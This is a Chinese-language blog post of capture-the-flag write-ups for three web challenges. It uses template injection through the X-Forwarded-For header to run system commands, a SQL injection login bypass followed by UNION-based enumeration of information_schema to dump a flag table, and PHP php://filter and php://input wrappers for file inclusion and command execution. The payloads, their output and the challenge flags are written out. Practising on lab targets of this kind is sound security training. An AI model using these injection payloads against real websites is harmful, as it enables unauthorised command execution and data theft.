其他分享
首页 > 其他分享> > 1.21

1.21

作者:互联网

[BJDCTF2020]The mystery of ip

首先打开题目

 

有三个页面,一个index.php一个flag.php一个hint.php

只有第二个flag.php的页面有ip

 

然后ip就想到了X-Forwarded-For

于是直接用hackbar改x-forwarded-for

首先改成1试试

回显

Your IP is : 1 

然后改成1+1

回显

Your IP is : 1+1

然后改成{{1+1}}

结果回显

Your IP is : 2 

很明显是ssti服务器模板注入题目

直接payload:

X-Forwarded-For: {{system('ls /')}}

回显

Your IP is : bin dev etc flag home lib media mnt opt proc root run sbin srv sys tmp usr var var 

说明ssti注入成功了,于是直接payload:

X-Forwarded-For: {{system('cat /flag')}}
Your IP is : flag{6a448c30-c2d5-4f57-9871-99a146e2d4a7}

 

 

CTFshowweb2

 

首先直接用户名admin然后密码采用' or 1=1#进行sql注入。

回显

 

说明注入成功了,存在sql漏洞

于是直接采用联合查询(因为这里是post方式提交,所以采用bp抓包进行修改传参)

payload:' union select 1,group_concat(schema_name),3 from information_schema.schemata#

爆出库的名字

information_schema,test,ctftraining,mysql,performance_schema,web2

然后再爆出表的名字:

payload:' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema like 'web2'#

然后得到:

flag,user

然后再爆出列的名字:

payload:' union select 1,group_concat(column_name),3 from information_schema.columns where table_name like 'flag'#

然后回显:

flag

然后可以payload:

payload:' union select 1,group_concat(flag),3 from web2.flag#

然后得到:ctfshow{51201966-2b6a-46be-9c65-eb6f63bb9435}

 

CTFshowweb3

 

首先打开题目只有这样一个,题目提示是说PHP伪协议

然后我先

payload:?url=php://filter/convert.base64-encode/resource=index.php

然后经过解码得到

<?php
error_reporting(0);
$url=$_GET['url'];
if(isset($url)){
  include($url);
}
   
?>
<?php
           
          $code="<?php include($"."_GET['url']);?>";
          highlight_string($code);
?>

然后并没有什么用处,然后我尝试采用:

payload:?url=php://input
并且同时post提交一个<?php system('ls');?>

然后得到了

ctf_go_go_go index.php 

于是然后提交一个<?php system('cat ctf_go_go_go');?>

得到了最终答案 ctfshow{9bb7e56e-4785-4ffe-91b9-a05e75014117}

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

标签:url,然后,flag,1.21,php,payload,schema
来源: https://www.cnblogs.com/FPointzero/p/15832074.html